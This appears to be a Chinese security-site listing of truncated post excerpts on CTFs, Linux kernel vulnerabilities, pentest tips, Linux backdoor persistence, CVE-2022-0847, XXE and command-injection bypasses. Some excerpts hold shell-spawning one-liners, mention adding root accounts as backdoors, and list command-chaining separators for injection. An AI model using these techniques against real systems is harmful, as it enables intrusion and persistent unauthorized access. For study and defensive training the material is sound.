三个白帽题目。0x01 找到源码目标 http://24caf446e2bb0e659.jie.sangebaimao.com/ 首先扫描发现其包含.git目录,但访问/.git/index发现没有这...
Netfilter 防火墙模块中的新 Linux 漏洞让攻击者获得 Root 访问权限
内核恐慌(有时缩写为KP )是操作系统内核在检测到无法安全恢复或继续运行系统的内部致命错误时采取的一种安全措施重大数据丢失。该术语主要针对Unix和类 Unix系统。对于Micr...
3分钟看懂linux磁盘划分
来源:运维学习分享前几天遇到了这样一个情景:一个服务器是以虚拟机的形式提供的,通过df -h看服务器磁盘空间只有30多个G,但通过fdisk -l看发现有一个160G的磁盘空间 没有挂载,因此需要在不...
渗透Tips - 第二十期
1、不同方法生成反弹交互式shellpython -c 'import pty; pty.spawn("/bin/sh")'echo os.system('/bin/bash')/bin/sh -ip...
权限维持之Linux后门
在渗透过程中拿到目标权限只是开始,通常会留下后门以便再次访问(简称APT)。因此需要进行权限维持,隐藏后门。本文将对Linux下常见的权限维持后门技术进行解析,知己知彼百战不殆。1.添加root账户原...
CVE-2022-0847漏洞复现
网安引领时代,弥天点亮未来 0x00写在前面本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!0x01漏洞描述  ...
【原创工具】github监控工具
0X01 前言前段时间朋友想要我写的github监控工具,我本着独乐乐不如众乐乐的心态,就答应我朋友说过几天发到公众号上,今天实现一下子诺言,工具获取方法在文章底部。如果您觉得这个小工具对您有用,点个...
HackTheBox-Linux-Irked
一个每日分享渗透小技巧的公众号大家好,这里是 大余安全 的第 143 篇文章,本公众号会每日分享攻防渗透技术给大家。靶机地址:https://www.hackt...
Linux系统安全(五) | Linux中awk工具的使用
本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安世加的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!欢迎各位添加微...
关于Blind XXE
开篇 关于XXE,很早之前内部做过分享,个人觉得漏洞本身没太多的玩点,比较有意思主要在于:不同语言处理URI的多元化和不同XML解析器在解析XML的一些特性。在科普Blind XXE之前,假定你们已经...
命令注入绕过方法总结
点击上方蓝字,记得关注我们!一、常见拼接符|直接执行后面的语句&前面和后面命令都要执行,无论前面真假||如果前面命令是错的执行后面的命令;否则只执行前面的语句&&如果前面为假,...
Linux环境下后门维持的N种姿势
前言渗透测试中大家经常会遇到各类Linux系统的主机,今天我们就linux下后门维持的几种姿势做一个总结和抛砖引玉。姿势一、PAM后门概述:PAM (Pluggable AuthenticationM...
32